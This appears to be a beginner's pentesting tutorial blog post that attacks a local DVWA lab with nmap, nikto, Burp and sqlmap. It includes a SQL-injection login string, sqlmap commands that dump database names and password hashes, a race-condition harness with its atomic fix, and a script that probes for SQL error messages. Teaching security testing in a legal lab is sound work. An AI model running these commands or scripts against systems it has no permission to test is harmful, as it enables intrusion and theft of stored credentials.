
╔══════════════════════════════════════════════════════════╗
║   YOUR FIRST PENTEST — FREE TOOLS ONLY                   ║
║                                                          ║
║   [ LOCAL LAB ]                                          ║
║     └── DVWA on Docker  ░░░░  legal target               ║
║              │                                           ║
║              ▼                                           ║
║   [ RECON ]                                              ║
║     └── nmap -sV localhost                               ║
║              │                                           ║
║              ▼                                           ║
║   [ INTERCEPT ]                                          ║
║     └── Burp Suite Community (free)                      ║
║              │                                           ║
║              ▼                                           ║
║   [ EXPLOIT ]                                            ║
║     ├── sqlmap  →  SQL injection                         ║
║     └── nikto   →  server misconfig                      ║
║                                                          ║
║   Cost: $0   Time: ~1 hour   Stack: free tools           ║
╚══════════════════════════════════════════════════════════╝
Security 101

Your First Pentest: A Practical Intro Using Free Tools

May 2026

No paid accounts. No vendor lock-in. Just a terminal, a local lab, and the same tools professional pentesters use every day.


What Is Pentesting, Actually?

Penetration testing (pentesting) is the practice of attacking your own systems the way a malicious actor would, before they get the chance to. The canonical reference for what to look for is the OWASP Top 10, but the mindset matters more than any checklist: assume something is broken, then prove it.

Most introductions to pentesting lead you straight to a product signup. This one does not. Everything below is free to use, runs locally on your laptop, and is what working security engineers reach for every day; all of it except Burp Suite Community (free, but proprietary) is open source as well. Once you are comfortable here, the natural next step is wiring these checks into CI. See Continuous Pentesting in CI for the automated, gated version of this same workflow.

Never pentest systems you do not own or have explicit written permission to test. Even well-intentioned scanning of a live system you do not control can be a criminal offence in many jurisdictions. Set up a local lab instead; it takes about ten minutes.

The Lab — DVWA on Docker

DVWA (Damn Vulnerable Web Application) is a PHP/MySQL app deliberately riddled with common vulnerabilities, each exposed at a selectable security level (Low, Medium, High, Impossible). It is the closest thing to a standardized training ground the web security community has.

docker pull vulnerables/web-dvwa
docker run -d -p 127.0.0.1:80:80 vulnerables/web-dvwa

# Binding to 127.0.0.1 keeps the container off your LAN; a plain -p 80:80
# would publish it on every interface of your machine.
# Open http://localhost, log in with: admin / password
# Click "Setup / Reset DB": you now have a legal target.
# Then open "DVWA Security" in the left-hand menu and set the level to Low;
# everything below assumes it.

Vulnerability Classes to Know

Before you touch a tool, understand what you are looking for. The OWASP Top 10 is the canonical list. These five are the ones a beginner meets first (IDOR lives under Broken Access Control in the Top 10, and the race condition has no category of its own, but it hides in the same code paths):

SQL Injection
  What happens: unsanitized input is concatenated into a database query
  Example: ' OR '1'='1 in a login form

Cross-Site Scripting (XSS)
  What happens: attacker-controlled script runs in another user's browser
  Example: a stored comment that executes JavaScript

IDOR (Insecure Direct Object Reference)
  What happens: changing an ID in a URL exposes another user's data
  Example: /api/orders/1337 → not your order

TOCTOU Race
  What happens: state changes between a check and its use
  Example: one balance check passes, two withdrawals execute

Broken Authentication
  What happens: weak session tokens, missing rate limits
  Example: brute-forcing a 4-digit PIN with no lockout

Spotlight — The TOCTOU Race

TOCTOU (Time-Of-Check vs Time-Of-Use) is subtle and worth understanding deeply. The code looks correct in review:

// Looks safe. Isn't.
async function transfer(userId, recipientId, amount) {
  const balance = await db.getBalance(userId);            // the check
  if (balance < amount) throw new Error("Insufficient funds");
  await db.deductBalance(userId, amount);                 // the use: the race window is between the read above and this write
  await db.creditRecipient(recipientId, amount);
}

Send two requests at the same time so that both getBalance calls return before either deductBalance commits, and the check passes twice: with 100 in the account, two withdrawals of 80 both succeed and the balance goes negative. A pentester catches this with a parallel-request harness, a short script that fires several copies of the same request at once and then compares the final state with what one request should have produced. A code reviewer often will not. The fix is to make the check and the write a single atomic operation, for example a conditional UPDATE ... WHERE balance >= amount whose affected-row count tells you whether the deduction happened, or a transaction that locks the row for the duration.
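The following is an added example (it is not code from the original post) that reproduces the double-spend against an in-memory stand-in for the database and shows the fix beside it. makeDb, transferRacy, transferAtomic, raceTransfers and demo are names invented for this example; the stand-in's deductIfSufficient plays the role of a conditional UPDATE ... WHERE balance >= amount in a real database, and the starting balances are constructed.

```javascript
// Added example, not from the original post: an in-memory stand-in for the
// database that reproduces the double-spend, plus the harness a pentester
// would use to trigger it. makeDb, transferRacy, transferAtomic and
// raceTransfers are names invented for this example.

function makeDb(initialBalances) {
  const balances = new Map(Object.entries(initialBalances));
  // Every "query" yields to the event loop once, like a network round trip,
  // so two in-flight transfers interleave the way they would against a real
  // database server.
  const roundTrip = () => new Promise((resolve) => setTimeout(resolve, 0));
  return {
    async getBalance(id) {
      await roundTrip();
      return balances.get(id) ?? 0;
    },
    async deductBalance(id, amount) {
      await roundTrip();
      balances.set(id, (balances.get(id) ?? 0) - amount);
    },
    async creditRecipient(id, amount) {
      await roundTrip();
      balances.set(id, (balances.get(id) ?? 0) + amount);
    },
    // Check and write in one step, the way
    //   UPDATE accounts SET balance = balance - ? WHERE id = ? AND balance >= ?
    // does in SQL: the affected-row count says whether the deduction happened.
    async deductIfSufficient(id, amount) {
      await roundTrip();
      const current = balances.get(id) ?? 0;
      if (current < amount) return false;
      balances.set(id, current - amount);
      return true;
    },
    snapshot() {
      return Object.fromEntries(balances);
    },
  };
}

// The pattern from the post: read, compare, then write. The window is the
// gap between getBalance returning and deductBalance committing.
async function transferRacy(db, from, to, amount) {
  const balance = await db.getBalance(from);
  if (balance < amount) throw new Error("Insufficient funds");
  await db.deductBalance(from, amount);
  await db.creditRecipient(to, amount);
}

// The fix: let the database decide atomically whether the funds suffice.
async function transferAtomic(db, from, to, amount) {
  const ok = await db.deductIfSufficient(from, amount);
  if (!ok) throw new Error("Insufficient funds");
  await db.creditRecipient(to, amount);
}

// Parallel-request harness: fire n transfers at once and report what landed.
async function raceTransfers(transfer, db, from, to, amount, n) {
  const results = await Promise.allSettled(
    Array.from({ length: n }, () => transfer(db, from, to, amount))
  );
  return {
    succeeded: results.filter((r) => r.status === "fulfilled").length,
    rejected: results.filter((r) => r.status === "rejected").length,
    balances: db.snapshot(),
  };
}

// Constructed scenario: alice holds 100, five concurrent attempts move 80 to
// bob. Only one should ever succeed.
async function demo() {
  const racy = await raceTransfers(transferRacy, makeDb({ alice: 100, bob: 0 }), "alice", "bob", 80, 5);
  const atomic = await raceTransfers(transferAtomic, makeDb({ alice: 100, bob: 0 }), "alice", "bob", 80, 5);
  return { racy, atomic };
}

demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

Run it with node: the racy version reports five successful transfers out of an account holding 100 and leaves it at -300, while the atomic version allows exactly one and rejects the other four. Against a real endpoint the harness is the same idea: build the request once, fire every copy before the first response arrives, and compare the final state with what a single request should have produced.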

The Free Tool Stack

Nmap
  Port and service discovery
  Install: brew install nmap | sudo apt install nmap

Burp Suite Community
  HTTP interception proxy (free to use; not open source)
  Install: download from portswigger.net/burp/communitydownload

SQLMap
  Automated SQL injection
  Install: pip install sqlmap | sudo apt install sqlmap

Nikto
  Web server misconfiguration scanner
  Install: sudo apt install nikto | brew install nikto

Recon — Nmap

Nmap is the first tool most pentesters reach for. It maps open ports and the services behind them, so its output is your attack-surface map. Version detection works from banners and probe responses, so treat the versions it reports as good guesses to confirm, not facts. Against the lab it will only see what Docker published, port 80.

nmap -sV -sC localhost

# -sV  →  probe open ports for service and version info
# -sC  →  run the default NSE script set (same as --script=default)

Intercept — Burp Suite Community

Burp Suite Community Edition is free and is the industry-standard HTTP proxy for web pentesting. It sits between your browser and the server and lets you inspect, modify, and replay every request.

  1. Start Burp, open Proxy, then the Intercept tab (leave intercept off if you only want to watch traffic in the HTTP history)
  2. Configure your browser to use 127.0.0.1:8080 as its HTTP proxy, or use the browser built into Burp, which is pre-configured
  3. Browse to DVWA; every request appears in Burp
  4. Right-click any request, Send to Repeater, modify, resend

Exploit — SQLMap

Once Burp shows you a parameter that might be injectable, SQLMap automates the proof. This is how you move from "possible injection point" to "I have the data." SQLMap needs the DVWA session cookie, which you copy from any request in Burp's HTTP history; without it the app redirects to the login page and SQLMap finds nothing. Add --batch to accept the default answer at every prompt.

sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="security=low; PHPSESSID=<your_session_id>" \
  --dbs

A Full Workflow, Start to Finish

Here is how a beginner session against DVWA actually flows. Start to finish: under 20 minutes, zero spend.

  1. nmap -sV localhost → Apache 2.4, PHP 7.2 on port 80
  2. nikto -h http://localhost → config file exposure, default creds
  3. Burp → intercept GET /vulnerabilities/sqli/?id=1 (DVWA Security set to Low) → send to Repeater
  4. Change id=1 to id=1' → MySQL error in response = injectable
  5. sqlmap -u "..." --dbs → dumps database names
  6. sqlmap -u "..." -D dvwa -T users --dump → retrieves password hashes
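As an added example (not from the original post or the DVWA project), here is step 4 turned into a script: append a single quote to the id parameter, fetch the page with your session cookie, and look for a database error string in the body. DVWA's low-security SQLi page concatenates the id value into a query of the form SELECT ... WHERE user_id = '$id', which is why the stray quote breaks it. markers, classifyResponse, probeUrl and probeSqli are names invented here; the sample response bodies are constructed, and the URL and cookie on the command line are assumptions you replace with your own lab values.

```javascript
// Added example, not from the original post: the manual "id=1'" check from
// step 4, automated. markers, classifyResponse, probeUrl and probeSqli are
// names invented here; the sample bodies below are constructed.

// Error strings that common databases leak when a quote breaks the query.
const markers = [
  { db: "MySQL", pattern: /You have an error in your SQL syntax|mysql_fetch|mysqli_/i },
  { db: "PostgreSQL", pattern: /pg_query\(|unterminated quoted string|syntax error at or near/i },
  { db: "SQLite", pattern: /SQLite3::query|unrecognized token|sqlite_/i },
  { db: "MSSQL", pattern: /Unclosed quotation mark|Microsoft SQL Native Client/i },
];

// Returns the first database whose error signature appears in the body,
// or null when the response looks clean.
function classifyResponse(body) {
  for (const { db, pattern } of markers) {
    if (pattern.test(body)) return db;
  }
  return null;
}

// Build the probe URL: the original parameter value with a single quote
// appended, which is what "Change id=1 to id=1'" in Burp Repeater does.
// URLSearchParams percent-encodes the quote as %27; the server decodes it.
function probeUrl(baseUrl, param) {
  const url = new URL(baseUrl);
  const original = url.searchParams.get(param) ?? "1";
  url.searchParams.set(param, original + "'");
  return url.toString();
}

// Fetch the probed page with the DVWA session cookie and classify it.
// security=low is the DVWA level at which this page is injectable.
async function probeSqli(baseUrl, param, cookie) {
  const url = probeUrl(baseUrl, param);
  const res = await fetch(url, { headers: { Cookie: cookie } });
  const body = await res.text();
  return { url, status: res.status, database: classifyResponse(body) };
}

// Constructed samples of response bodies, so the classifier can be
// exercised without a running lab.
const sampleErrorBody =
  "You have an error in your SQL syntax; check the manual that corresponds " +
  "to your MySQL server version for the right syntax to use near ''1''' at line 1";
const samplePgBody =
  "Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near \"'1''\"";
const sampleCleanBody = "<pre>ID: 1<br />First name: admin<br />Surname: admin</pre>";

if (typeof process !== "undefined" && process.argv[2]) {
  // Usage (assumed URL and cookie; substitute your own):
  //   node probe.js "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" "security=low; PHPSESSID=<your_session_id>"
  probeSqli(process.argv[2], "id", process.argv[3] ?? "security=low").then(console.log);
}
```

classifyResponse is the part you extend when a target runs a different database. A null result is not proof of safety; it only means this one error-based signal is absent, and blind or time-based injection still needs sqlmap or a manual test.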

What to Learn Next

Metasploit Framework
  Free exploit framework for network-level vulnerabilities

OWASP ZAP
  Open-source Burp alternative; its automated scanner and API are free, where Burp's active scanner is Pro-only

Gobuster / ffuf
  Directory and endpoint brute-forcing to find hidden attack surface

CTFs (HackTheBox, PicoCTF)
  Beginner-friendly scored challenges in legal lab environments

The Security Mindset

Tools are just tools. The actual skill is thinking adversarially: what assumption does this code make, and what happens when that assumption is wrong? A balance check assumes the balance will not change between read and write. A login form assumes the input is a string, not a SQL fragment. An API assumes the caller owns the resource ID they are passing.

Find the assumption. Break it. That is pentesting.

All tools mentioned are free; all but Burp Suite Community are open source. DVWA is for local use only: never expose it to a network you do not control, let alone a public server.
